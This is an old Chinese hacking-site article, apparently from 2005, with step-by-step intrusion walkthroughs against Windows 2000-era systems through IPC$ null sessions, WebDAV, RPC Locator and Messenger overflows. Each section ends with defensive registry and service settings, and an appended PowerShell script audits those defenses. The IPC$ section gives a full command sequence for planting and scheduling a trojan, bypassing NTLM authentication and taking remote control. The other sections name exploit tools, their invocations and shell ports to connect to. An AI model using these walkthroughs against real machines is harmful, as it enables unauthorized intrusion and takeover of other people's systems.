Classic intrusion techniques on high-traffic networks

Source: www.myhack58.com (Black Bar Security Net), vulnerability warning section, record MYHACK58:6220054477
Author: Anonymous (佚名). Published Nov 13, 2005.

【Introduction】
Legend has it that in the magical world of the Internet there is a group of nocturnal people: free-spirited, sharing the same belief, and in their eyes all living beings are equal and no wall is unbreakable. They are hackers! Today we share the classic intrusion techniques that hackers use most often.

Part One: The eternal IPC$

Intrusion difficulty: ★★★ (medium)

Prevalence: ★★★ (medium)

Danger index: ★★★★★ very high

Exploitation probability: ★★★★★ very high

Ease of use index: 75%

Editorial comments:

As everyone knows, security is a problem that ages: take the things that were tested a hundred times two years ago, such as the printer overflow and Unicode; this year you can basically no longer find a usable one!

There do seem to be exceptions, though: attacks on the IPC$ problem are still in common use and constantly renewed.

What is the IPC$ vulnerability:

IPC$ is a shared "named pipe" resource, mainly used for inter-process communication, and it is used when remotely managing a computer and viewing its shared resources. Using the default IPC$ we can create a null connection to the target host without a user name or password, and through that connection we can obtain the target host's user list.

We always talk about the "IPC$ vulnerability", but in fact IPC$ is not a vulnerability in the true sense. It is the remote network logon function opened to make remote administration easier for administrators, and it also opens the default shares, that is, every logical drive (c$, d$, e$...) and the system directory winnt or windows (admin$).

All of this is intended to ease administration, but good intentions do not necessarily produce good results. Some people with ulterior motives (what motives exactly? I don't know, it is just a figure of speech) use IPC$ to access shared resources, export the user list, and then run dictionary tools for password detection, hoping to gain higher privileges and so achieve those ulterior motives.

Attack tools:

Scanning software: Fluxay (流光) 4.71

Trojan software: srv.exe

Simple attack:

1. Open Fluxay 4.71.

2. Configure the scan settings.

3. Suppose the scan finds that 127.0.0.1 has the IPC$ vulnerability; we then perform the following operations:

C:\>net use \\127.0.0.1\IPC$ "" /user:"administrators"   // the password is the one Fluxay found

C:\>copy srv.exe \\127.0.0.1\admin$   // first copy srv.exe up; it is in Fluxay's Tools directory

The following is displayed:

c:\winnt\system32\

Copied 1 file(s)

C:\>net time \\127.0.0.1   // check the time; this is the other computer's time, i.e. the time on the 127.0.0.1 we want to break into. Note for everyone: convert the time to the 24-hour clock

C:\>at \\127.0.0.1 11:05 srv.exe   // start srv.exe with the at command

C:\>net time \\127.0.0.1   // check again whether enough time has passed

C:\>telnet 127.0.0.1 99   // telnet in; note that the port is 99, because here we are using srv.exe

C:\>copy ntlm.exe \\127.0.0.1\admin$   // open another DOS window and upload ntlm.exe to the host; it is also in Fluxay's tools directory

C:\WINNT\system32>ntlm   // run it to break the other machine's NTLM authentication mode, so that we can connect directly in telnet mode

C:\WINNT\system32>

C:\WINNT\system32>net start telnet   // then start telnet directly with net start telnet

The Telnet server is starting.

The Telnet server was started successfully.   // success

Now we can connect to the other side directly with TELNET 127.0.0.1.

This brings the intrusion to an end.

How to defend:

1. Forbid null sessions

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]

RestrictAnonymous = DWORD:00000001

2. Disable the administrative shares

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

AutoShareServer = DWORD:00000000

Part Two: The legendary WebDAV

Intrusion difficulty: ★★★ (medium)

Prevalence: ★★★★ high

Danger index: ★★★★★ very high

Exploitation probability: ★★★★ high

Ease of use index: 65%

Editorial comments:

Because of this article's space limits, while finalizing the selection we picked out one simple and practical approach; the WebDAV attack, which was used avidly from around March to May of this year, undoubtedly belongs on our list!

WebDAV vulnerability description:

Microsoft Windows 2000 supports the World Wide Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV, defined in RFC 2518, is a set of extensions to the Hypertext Transfer Protocol (HTTP) for Internet computing. The IIS service runs by default in the LocalSystem security context. Although Microsoft has provided a patch for this weakness and recommends that customers install the hotfix immediately, it also provides other tools and precautions that customers can use to prevent the weakness from being exploited while they assess the patch's impact and compatibility.

Attack tools:

Scanner: Webdavscan, a scanner designed specifically to detect whether an IIS 5.0 server provides WebDAV support

Overflow program: wdx.exe

Simple attack:

1. Use Webdavscan to scan and detect the target.

2. Use wdx.exe for testing; note that this takes patience, as you may have to try several offset values for the overflow.

3. Once the overflow succeeds, use telnet or nc to connect to port 7788 on the target host.

For example: telnet 127.0.0.1 7788

The following prompt appears:

Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>

The intrusion is over!

How to defend:

1. Find the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters

Add the following registry value:

Value name: DisableWebDAV

Data type: DWORD

Value data: 1

2. Apply the dedicated patch that Microsoft provides!

Part Three: The destroyer RPC

Intrusion difficulty: ★★ low

Prevalence: ★★★★★ very high

Danger index: ★★★★★ very high

Exploitation probability: ★★★★ high

Ease of use index: 80%

Editorial comments:

What I most love in martial arts novels is the passage where the author describes a gifted general whose might sweeps all before him! Looking at the RPC worm's impact on the global economy and this vulnerability's standing in the vulnerability field, I cannot help linking the two.

RPC vulnerability description:

The Windows RPC Locator service is a name service that maps logical names to network-specific names. Clients use RPC (Remote Procedure Call) together with the Locator service, which is responsible for resolving a client's network names into the actual addresses of resources such as disks, printers and other computer systems. For example, if a printer server has the logical name "laserprinter", the RPC client calls the Locator service to find the network name mapped to "laserprinter", and then calls the RPC service with that network name to submit its request.

However, when the Locator service receives registration information it does not check the parameters carefully. An overlong parameter can trigger a buffer overflow in the service program and crash the Locator service, and carefully constructed data may execute arbitrary commands on the system with the privileges of the Locator service process, giving the attacker system privileges.

By default the Locator service runs on Windows 2000 domain controllers, while Windows workstations and servers do not start it by default; but once these operating systems start the Locator service, they have this vulnerability too.

Attack tools:

Scanning tool: Locator Scanner, a command-line scanner designed specifically for this vulnerability; it can find hosts with the RPC Locator service open. Note that Locator Scanner can only scan one class C network range.

Overflow program: Re.exe

Simple intrusion:

1. Enter console (cmd) mode and use the command: rpc 192.168.0.1 192.168.0.254

This finds a host with the Locator service open; its address is 192.168.0.2.

Tip: the Locator Scanner usage is:

C:\>rpc IPAddress-Start IPAddress-End

IPAddress-Start: starting IP address of the scan

IPAddress-End: ending IP address of the scan

2. Use the dedicated RPC overflow tool to perform the overflow; the privilege obtained after the overflow is SYSTEM.

Use the command: re -h 192.168.0.2

This intrusion is over!

How to defend:

If your computer is not a domain controller of a Windows network, it is strongly recommended that you do not use the Locator service; if it has been enabled, turn it off. To stop the Windows Locator service on Windows 2000 and Windows XP, open "Control Panel - Administrative Tools - Services" and check whether the Remote Procedure Call (RPC) Locator service is started; if it is, stop it and set the RPC Locator service's startup type to "Disabled".

If you really need the Locator service, apply the patch as soon as possible.

Part Four: The upstart Messenger

Intrusion difficulty: ★★★ (medium)

Prevalence: ★★★★★ very high

Danger index: ★★★★★ very high

Exploitation probability: ★★★★★ very high

Ease of use index: 85%

Editorial comments:

The vulnerabilities that have burst out recently are naturally good, alas, but poor me and my Messenger sender: after this I probably will not be able to chat with the girls in the C subnet any more...

Messenger vulnerability description:

The Windows NT/2000/XP/2003 operating systems have the Messenger (message queue) service enabled by default.

It is used between NT servers to send and receive messages from the system administrator or the "Alerter" service. This service has a buffer overflow vulnerability: because the buffer that holds a message does not properly check the message length before storing the data, an attacker can exploit it to carry out an overflow, causing a denial of service in which the computer stops responding and restarts automatically, or to execute arbitrary code. The specific overflow is in the search-by-name function of the message queue service program; an overly long string submitted to this function may cause a heap overflow.

Attack tools:

Scanning tool: RetinaMSGSVC.exe, the MS03-043 Messenger vulnerability scanner from the well-known foreign security company eEye

Overflow tool: msgr.exe

Simple attack:

1. Open RetinaMSGSVC.exe and start scanning the target.

2. Use msgr.exe to overflow the target; on success it binds a shell on port 9191 of the target host, which lets us take control next.

Command format, for example: msgr.exe 192.168.0.2 0

3. Use the telnet command to connect to the host.

Command format, for example: telnet 192.168.0.2 9191

The intrusion is over!

How to defend:

Messenger messages are submitted to the message service via NetBIOS or RPC, so such messages can be blocked by closing the NetBIOS ports (137-139) and using a firewall to filter UDP broadcast packets. On the border firewall or a personal firewall, prohibit untrusted hosts from accessing the NetBIOS and RPC ports 135, 137, 138 and 139 (TCP/UDP). If you do not use the Messenger service, disable it: open the "Start" menu, click "Control Panel", open "Administrative Tools", double-click "Services", locate and double-click "Messenger", click "Stop", and in the "Startup type" drop-down box select "Disabled".

Microsoft has provided a security patch that fixes this vulnerability; different operating systems need different patches, so select and download the patch for your system from the security bulletin on Microsoft's website.
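As an added example that is not part of the original article, the following PowerShell script audits on one host the four defenses the article lists (RestrictAnonymous and AutoShareServer for IPC$, DisableWebDAV for WebDAV, and the RPC Locator and Messenger services) and, when run with -Fix, applies the settings the article gives. It assumes an elevated PowerShell 5 or later and the service names RpcLocator and Messenger; the [OK]/[MISSING] labels are my own.

```powershell
# Added example, not from the original article: audit (and optionally apply)
# the defensive settings listed in the article. Run elevated; pass -Fix to apply.
param([switch]$Fix)

# Registry values the article gives as defenses, with the value it expects.
$checks = @(
    @{ Name = 'IPC$: RestrictAnonymous';
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';
       Value = 'RestrictAnonymous'; Expected = 1 },
    @{ Name = 'IPC$: AutoShareServer';
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters';
       Value = 'AutoShareServer'; Expected = 0 },
    @{ Name = 'WebDAV: DisableWebDAV';
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters';
       Value = 'DisableWebDAV'; Expected = 1 }
)

foreach ($c in $checks) {
    # A missing value reads as $null, which is reported as MISSING below.
    $current = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
    if ($current -eq $c.Expected) {
        Write-Output "[OK]      $($c.Name) = $current"
    } else {
        Write-Output "[MISSING] $($c.Name) is '$current', expected $($c.Expected)"
        if ($Fix) {
            if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
            New-ItemProperty -Path $c.Path -Name $c.Value -PropertyType DWord `
                -Value $c.Expected -Force | Out-Null
        }
    }
}

# Services the article says to stop and disable when they are not needed
# (service names assumed: RpcLocator for the RPC Locator, Messenger for Messenger).
foreach ($svc in 'RpcLocator', 'Messenger') {
    $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if (-not $s) { Write-Output "[N/A]     service $svc is not installed"; continue }
    if ($s.Status -eq 'Running' -or $s.StartType -ne 'Disabled') {
        Write-Output "[MISSING] service $svc is $($s.Status), start type $($s.StartType)"
        if ($Fix) {
            Stop-Service -Name $svc -Force -ErrorAction SilentlyContinue
            Set-Service -Name $svc -StartupType Disabled
        }
    } else {
        Write-Output "[OK]      service $svc is stopped and disabled"
    }
}
```

Running the script without -Fix only reports; the registry changes take effect for new sessions and the AutoShareServer change removes the admin$ and drive shares only after the Server service restarts.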